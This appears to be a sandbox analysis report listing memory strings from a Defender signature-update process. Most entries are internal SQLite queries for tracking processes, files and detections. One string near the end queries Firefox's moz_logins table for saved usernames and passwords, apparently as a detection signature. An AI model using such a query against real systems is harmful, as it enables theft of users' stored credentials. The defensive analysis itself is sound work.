Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
